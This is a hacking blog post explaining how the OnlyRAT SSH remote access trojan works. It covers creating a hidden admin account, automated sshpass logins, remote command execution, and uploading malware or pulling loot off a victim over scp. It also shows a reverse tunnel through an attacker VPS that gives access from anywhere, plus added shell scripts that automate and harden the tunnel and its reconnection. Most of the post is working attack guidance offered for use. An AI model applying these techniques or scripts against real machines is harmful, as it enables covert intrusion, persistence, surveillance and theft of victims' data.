By C0SM0

SSH Network Attacks In OnlyRAT

// Automating Network Oriented Attacks in Malware...


Hey Hackers! Many of you may already be familiar with my tool OnlyRAT. If not, allow me to introduce it. OnlyRAT is a network oriented Remote Access Toolkit [RAT]. It lets us remotely access a target system, upload files to it, download files from it, and execute arbitrary commands on it. Originally, OnlyRAT was supposed to be a simple, YouTube friendly, SSH RAT.

SSH, otherwise known as Secure Shell, is a network protocol that allows users to remotely access the command line on another system. It is often used in network administration to easily allow administrators to remotely conduct tasks on a computer.

But as I continued development, I got to learn how powerful SSH really is and a lot of the cool things you can do with it. OnlyRAT went from a shitty proof of concept to a network oriented RAT, meaning that all of our attacks are sent as commands over the network. There is no implant binary left behind for file-based Anti-Virus [AV] to scan; what remains visible is the installer that runs once, the new local account, the sshd service it turns on, and the network connections, which is where a defender would have to look.


 
 

// OnlyRAT Basics:

Before we can dive into how powerful SSH truly is, we have to understand the OnlyRAT malware itself. OnlyRAT can be installed onto a target computer in two ways: directly from the GitHub page it is hosted on, or from a Virtual Private Server [VPS].

A VPS is a server rented from a hosting provider and reachable directly on the internet, so we can access it from anywhere. It has a static public IP address that doesn't change, so we can always reach out to it or host services on it with ease.

OnlyRAT has scripts that automate either installation, but there is a reason why both options exist [totally not a foreshadow towards something really cool we can do with SSH]. Once either script runs, it creates a hidden local administrator [named "onlyrat"] on the target system and opens port 22 [the default port for SSH]. Once completed, the installation script sends a "<username>.rat" configuration file back to the attacker.

The configuration file holds everything OnlyRAT needs to reach back to the target computer, and the collection of configuration files doubles as the attacker's database of compromised targets. Each file records:

  1. Target IP Address

  2. OnlyRAT Admin Password

  3. Target Temp Directory

  4. Target Startup Directory

  5. VPS IP Address

  6. VPS Port

  7. Connection Type

Note: a VPS is NOT required for OnlyRAT to work. Items 5 and 6 are only present when OnlyRAT was installed through a VPS.

// Basic SSH:

Let's say there is an SSH server on the network with an IP address of 192.168.1.50. We can connect to it with the basic syntax: the ssh command, followed by the username we want to log in as, an "@", and the IP address of the server, i.e. ssh onlyrat@192.168.1.50.

After hitting enter, we are prompted for our password and officially have remote access to a computer. If we want to automate the connection in some sort of malware, we can use a tool called sshpass to supply the password so we don't have to type it into a prompt. All we need to do is put our SSH command after sshpass with the password passed in a "-p" flag. One caveat: anything passed on the command line shows up in the process list, so every other user on the attacker box can read the password out of "ps" while the session is up; sshpass can also take the password from a file ["-f"] or from the SSHPASS environment variable ["-e"] for exactly that reason.

sshpass -p "DXael" ssh onlyrat@192.168.1.50 

Now we can immediately SSH into a server with no password prompt needed. So we officially automated remote connections into computers. This is essentially how OnlyRAT's "orconsole" feature works.
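As an added example, not part of OnlyRAT or its console, here is how a practitioner would wire sshpass into a script for both the ssh and scp cases without the password ever appearing on a command line. It assumes sshpass and the OpenSSH client [7.6 or newer, for accept-new] are installed on the attacker box; the onlyrat user, 192.168.1.50 and the password DXael are the page's own values, and the secret-file path in the usage comment is made up for the example.

```shell
#!/bin/sh
# Added example (not OnlyRAT's code): unattended ssh/scp through sshpass without
# the password on the command line. Assumes sshpass and an OpenSSH client.

# Client options for scripted use:
#  - NumberOfPasswordPrompts=1: a wrong password fails at once instead of stalling
#    on a second prompt that sshpass will not answer
#  - StrictHostKeyChecking=accept-new: pin the host key on first contact but still
#    refuse a *changed* key (plain "=no" would also accept a man-in-the-middle)
#  - ConnectTimeout=10: do not hang forever on a firewalled port 22
ssh_opts() {
  printf '%s\n' -o NumberOfPasswordPrompts=1 \
                -o StrictHostKeyChecking=accept-new \
                -o ConnectTimeout=10
}

# Load the password from a file only we can read into $SSHPASS. "sshpass -e" then
# takes it from the environment, so `ps` shows "sshpass -e ssh ..." rather than
# "sshpass -p DXael ...". Group- or world-readable files are refused.
load_secret() {
  f=$1
  [ -f "$f" ] || { echo "no secret file: $f" >&2; return 1; }
  mode=$(stat -c %a "$f" 2>/dev/null || stat -f %Lp "$f")   # GNU stat, then BSD stat
  case $mode in
    600|400) ;;
    *) echo "refusing $f: mode is $mode, want 0600" >&2; return 1 ;;
  esac
  SSHPASS=$(head -n 1 "$f")
  export SSHPASS
}

# Interactive session, or a one-shot remote command when a third argument is given.
# Word-splitting $(ssh_opts) is intended: it emits one option word per line.
rat_ssh() {
  sshpass -e ssh $(ssh_opts) "$1@$2" ${3:+"$3"}
}

# Upload and download. The caller single-quotes a Windows remote path so the local
# shell does not eat its backslashes.
rat_put() { sshpass -e scp $(ssh_opts) "$3" "$1@$2:$4"; }
rat_get() { sshpass -e scp $(ssh_opts) "$1@$2:$3" "$4"; }

# Usage against a live target (the secret-file path is an assumption of this example):
#   load_secret ~/.onlyrat/192.168.1.50.pass && rat_ssh onlyrat 192.168.1.50 dir
#   rat_put onlyrat 192.168.1.50 file.txt 'C:\Users\Jerry\Desktop'
#   rat_get onlyrat 192.168.1.50 'C:\Users\Jerry\Desktop\file.txt' .
```

The mode check is the part worth keeping even if you drop the rest: a password file that is readable by others is no better than "-p" on the command line.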


// Remote Code Execution:

Yeah you heard me right, we can execute code over SSH. No, I don't mean remotely connecting to a computer and then typing in code to execute. I am talking about a one liner that passes a command along with our SSH connection. We simply put the command in quotes after the user@host part, and the SSH server hands it to that user's default shell on the target [on Windows, OpenSSH's default shell is cmd.exe]. Let's try listing the contents of a directory [assuming our target is a Windows computer].

# normal ssh
ssh onlyrat@192.168.1.50 'dir'

# password parsing
sshpass -p "DXael" ssh onlyrat@192.168.1.50 'dir'

Running either of these commands returns the contents of the directory we land in, normally the onlyrat user's profile folder. In place of "dir", we can put any Windows command line we want. If we want to run PowerShell, we can put "powershell -Command" [or its short form "-c"] followed by whatever PowerShell code we wish to run. We can also run any executable we want like calculator, notepad, or any malware we may have on the system. But note that we will be running them as the OnlyRAT user, and not as our target. There is a work around I will discuss later.


// File Upload and Download:

While SSH is designed for remote shells, another program built on top of SSH lets us upload and download files to and from a target computer. It is called Secure Copy, but usually referred to as "scp". To upload a file, we run scp and pass in the file we want to upload, then the user@host to save it to, a colon ":", and the path to save the file to on that host. One catch with Windows targets: the remote path contains backslashes, and an unquoted backslash is an escape character in our local shell, so "C:\Users\Jerry\Desktop" would arrive as "C:UsersJerryDesktop". Single-quote the remote path [or use forward slashes, which Windows also accepts].

# normal scp [remote path single-quoted so the local shell keeps the backslashes]
scp file.txt onlyrat@192.168.1.50:'C:\Users\Jerry\Desktop'

# recursive scp for directory uploads
scp -r folder onlyrat@192.168.1.50:'C:\Users\Jerry\Desktop'

Great! We can upload files to a target, but it's still prompting us for our OnlyRAT user password. Well, if scp is built on SSH, can we use sshpass? Yes, yes you can!

sshpass -p "DXael" scp file.txt onlyrat@192.168.1.50:'C:\Users\Jerry\Desktop'

Now we can automate file uploads! So we can upload malware, malicious documents, payloads, fake shortcuts on their desktop, whatever it may be. To download with scp, we run scp and pass in the user@host, the path on that host [again after a colon ":"], and then where to save it on our computer. In this example, we use the period "." for our current directory.

# normal scp [remote path single-quoted so the local shell keeps the backslashes]
scp onlyrat@192.168.1.50:'C:\Users\Jerry\Desktop\file.txt' .

# password parsing
sshpass -p "DXael" scp onlyrat@192.168.1.50:'C:\Users\Jerry\Desktop\file.txt' .

Now we have automated our ability to download files off our target computer. This is great for any documents, photos, or loot we wish to exfiltrate from a target.


// Port Forwarding:

Up until this point, we have only been able to reach our target while on the same network. If the attacker moved to another network, they couldn't reach back to "192.168.1.50": that is a private address, it isn't routable across the internet, and on the new network it either belongs to a different machine or to nobody. Typically, to expose the target's port we would need to change the configuration of the target's router so the port is forwarded in from the internet. Our malware has no access to the router and no way to edit its configuration. But SSH can carry a port out of the network for us. Here is a little diagram showcasing the network layout.

The section on the top shows what we are already familiar with: a local SSH connection between two computers. This local connection would have been set up through the "From GitHub" install option. The section on the bottom shows SSH's port forwarding. The VPS installation of OnlyRAT does a few extra steps beyond the default "From GitHub" installation. The attacker can use ...

onlyrat -s

# or

onlyrat --setup

... to set up their attacker machine and VPS [more instructions here]. But I will show you how it works in more depth. On our VPS, we edit the "/etc/ssh/sshd_config" file and set the following:

AllowTcpForwarding yes
GatewayPorts yes

AllowTcpForwarding lets clients open forwarded ports through the VPS at all; GatewayPorts makes a remote forward bind on the VPS's public interface instead of only on loopback, so the forwarded port is reachable from the whole internet [which also means anyone who finds the port can try the onlyrat password against the target]. After we restart the SSH service, we create an SSH key on our attacker machine for our VPS server.

An SSH key is really a key pair: the private half stays with whoever connects, and the public half is added to "~/.ssh/authorized_keys" on the server for the account it should unlock. That way we can connect without a password, or, more securely, protect the private key with a passphrase instead.

To generate the key, we use the "ssh-keygen" program. We save it under the name "key" and give it no passphrase. The reason for no passphrase is that Windows doesn't have sshpass, so the key is what lets the target authenticate to the VPS unattended. With our new key, we set its permissions and copy the public half to the VPS.

ssh-keygen -t ed25519 -f key -N ''   # writes key (private) and key.pub (public); -N '' = no passphrase, key type is our choice
chmod 600 key                        # ssh refuses to use a private key readable by others
ssh-copy-id -i key user@X.X.X.X      # appends key.pub to the VPS user's ~/.ssh/authorized_keys
ssh user@X.X.X.X -i key              # test the key
  • user - username of the account on the VPS

  • X.X.X.X - domain name or IP address of the VPS
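The line ssh-copy-id writes grants the key a full shell on the VPS. As an added example, not OnlyRAT's own setup, here is how to write the authorized_keys entry by hand so the key can do exactly one thing, open the "-R" listener, and nothing else. It assumes OpenSSH 7.8 or newer on the VPS [needed for permitlisten] and the key pair from above saved as key and key.pub; the port 9494 and the user@X.X.X.X placeholders are the page's own.

```shell
#!/bin/sh
# Added example (not part of OnlyRAT): pin down what the key handed to the target
# may do on the VPS. Assumes OpenSSH 7.8+ on the VPS and key.pub from ssh-keygen.

# Accept only 1-65535.
valid_port() {
  case $1 in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# authorized_keys line that lets the holder of this key open exactly one -R
# listener and nothing else:
#   restrict          turns off pty, agent/X11 forwarding, user-rc and all forwarding
#   port-forwarding   turns forwarding back on ...
#   permitlisten      ... but only "-R <port>:..." on this one port is accepted
#   command=          any shell or command request runs this instead, so whoever
#                     lifts the key off the target gets no shell on the VPS
restricted_key_entry() {
  port=$1 pubkey=$2
  valid_port "$port" || { echo "bad port: $port" >&2; return 1; }
  printf 'restrict,port-forwarding,permitlisten="%s",command="/bin/false" %s\n' "$port" "$pubkey"
}

# Append the restricted line for the VPS account, instead of running ssh-copy-id.
install_restricted_key() {
  port=$1 pub=$2 dest=${3:-"$HOME/.ssh/authorized_keys"}
  umask 077
  mkdir -p "$(dirname "$dest")"
  restricted_key_entry "$port" "$(cat "$pub")" >> "$dest"
}

# Usage, on the VPS as the tunnel account, with key.pub copied over first:
#   install_restricted_key 9494 key.pub
```

Two things go with this entry. The client must connect with "-N" [no remote command]; without it the forced /bin/false runs, exits, and takes the tunnel down with it. And on the sshd side, "AllowTcpForwarding remote" inside a "Match User" block for the tunnel account, with GatewayPorts left at "no", keeps the forwarded port on the VPS's loopback only; you then reach the target with ssh -J user@X.X.X.X onlyrat@localhost -p 9494 instead of exposing the target's sshd to the whole internet.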

Now we use our VPS to host a web server so the key is reachable across the internet by our target. The target needs this key to connect to our VPS and route traffic from its SSH port to a port on the VPS. Make sure the key file is world-readable, or the web server answers 403. Be aware of what this means: the private key for our VPS account now sits in an unauthenticated web root and, after download, on the target's disk, so anyone who finds either copy can log in to the VPS as that user.

scp key user@X.X.X.X:/var/www/html   # a single file, so no -r needed [assumes the VPS user may write there]
ssh user@X.X.X.X
cd /var/www/html
chmod +r key                         # the web server runs as its own user and has to be able to read it
sudo service apache2 start
  • apache2 - the web server software

Now all that needs to happen is for our target machine to make a web request to download the key, and execute the following command.

ssh -R 9494:localhost:22 user@X.X.X.X -i key

The SSH command above uses "-R" to ask the VPS's sshd to listen on a port, here "9494", and send anything that connects to it back down the tunnel. After the colon we say where those connections should end up, in this case our own SSH service on localhost port 22. The rest is a normal SSH connection, plus "-i" to authenticate with the key, so the whole thing runs without a password prompt.


// Connecting To The Forwarded Port:

To reach our target through the port forwarded on the VPS, we connect to the VPS on that port as the onlyrat user [the VPS hands the connection straight to the target's sshd, so it is the target's onlyrat password, not the VPS account's, that we log in with]. Ports are given with the "-p" argument.

ssh onlyrat@X.X.X.X -p 9494

Just like that, we can access our target machine from anywhere on the internet! Of course, that was a lot of configurations we had to do, so OnlyRAT will automate most of this process for us.


// OnlyRAT Flaws:

OnlyRAT is a really clever malware and a great general proof of concept. It leans on features of SSH that were built as administrative conveniences and turns them to its advantage. But on a network where SSH is blocked, OnlyRAT would not be the ideal malware to use. We could try moving SSH to another port, but whether that works still depends on the firewall we are dealing with.

Since Windows doesn't have sshpass, we need an SSH key to automate the connection from our target to our VPS. The main problem with this is that there is now an SSH key that grants access to our VPS simply sitting on our target computer.

When the target routes through one of the ports on our VPS, that port shows as busy because the target's SSH traffic is being routed through it. This is expected, but if the target were to restart their computer, OnlyRAT would be unable to reconnect to the VPS, because the old session's listener still holds the port: the VPS's sshd does not notice the client is gone until the dead TCP connection times out or a keepalive fails. The fix belongs on both ends rather than in a port-clearing script: "ClientAliveInterval" and "ClientAliveCountMax" in the VPS's sshd_config make sshd drop dead sessions [and their listeners] within a minute or so, and "ExitOnForwardFailure=yes" on the client makes a reconnect attempt fail visibly, instead of connecting without a tunnel, so it can be retried.
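As an added example, not OnlyRAT's own code, here is a target-side tunnel keeper for the "-R" connection described above that handles exactly this failure: it makes the ssh client fail loudly when the VPS port is still held by a dead session, backs off, and retries until sshd has reaped the old listener. It assumes the OpenSSH client; user, X.X.X.X, key and 9494 are the page's placeholder values.

```shell
#!/bin/sh
# Added example (not OnlyRAT's code): keep "ssh -R 9494:localhost:22" alive and
# recover when the VPS still holds the port from a dead session. Assumes an OpenSSH
# client; user, X.X.X.X, key and 9494 are the page's placeholder values.

VPS_USER=${VPS_USER:-user}
VPS_HOST=${VPS_HOST:-X.X.X.X}
REMOTE_PORT=${REMOTE_PORT:-9494}
KEY=${KEY:-key}

# One argument per line so the caller can `set --` on the output.
#  -N                    open no shell, so a forced command on the key never runs
#  ExitOnForwardFailure  "port 9494 already in use" on the VPS becomes exit code
#                        255 instead of a connected-but-useless session
#  ServerAlive*          notice a dead link after 3 x 10s instead of waiting for
#                        the TCP stack to give up
#  BatchMode             never stop on a prompt nobody is there to answer
tunnel_args() {
  printf '%s\n' -N -i "$KEY" \
    -o ExitOnForwardFailure=yes \
    -o ServerAliveInterval=10 -o ServerAliveCountMax=3 \
    -o StrictHostKeyChecking=accept-new -o BatchMode=yes \
    -R "$REMOTE_PORT:localhost:22" "$VPS_USER@$VPS_HOST"
}

# Capped exponential backoff: attempt n waits min(2^n, 60) seconds, so a VPS that
# is down for a while is not hammered, but a freed port is retaken within a minute.
backoff() {
  n=$1
  if [ "$n" -gt 6 ]; then n=6; fi
  w=$((1 << n))
  if [ "$w" -gt 60 ]; then w=60; fi
  echo "$w"
}

# Reconnect loop. A clean exit (for example sshd on the VPS restarting) resets the
# backoff; a failed bind or a dropped link counts as one more failed attempt.
keep_tunnel() {
  attempt=0
  while :; do
    # word-splitting is intended: no argument above contains whitespace
    set -- $(tunnel_args)
    if ssh "$@"; then
      attempt=0
    else
      attempt=$((attempt + 1))
    fi
    sleep "$(backoff "$attempt")"
  done
}

# VPS side: with "ClientAliveInterval 15" and "ClientAliveCountMax 3" in sshd_config
# the dead session that owns 9494 is reaped by sshd itself within about a minute,
# so no port-clearing script is needed; until then this loop simply waits it out.

case ${1:-} in run) keep_tunnel ;; esac
```

Run it as `sh tunnel.sh run` from whatever startup mechanism the installer already uses; the same loop also covers a VPS reboot, since the bind keeps failing until sshd is back and the backoff keeps the retries spaced out.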


// Malware Execution:

We aren't the target user, we are a hidden admin. So when we connect with the OnlyRAT Console [orconsole], we log in as the onlyrat admin user, not the target user, because we don't have the target's password. In the orconsole, if we ran "notepad.exe", the notepad window wouldn't pop up on the target's screen: our SSH session lives in its own Windows logon session with no access to the target's interactive desktop, so anything we start from it has no visible window. Notepad still runs, whether we see it or not. This means we can still run system level malware and have it execute system wide. For example, a malware that captures photos from the webcam would still work even when run as our onlyrat user.


Thanks for reading, and as always,


Happy Hacking!


© 2022 by Cosmodium CyberSecurity LLC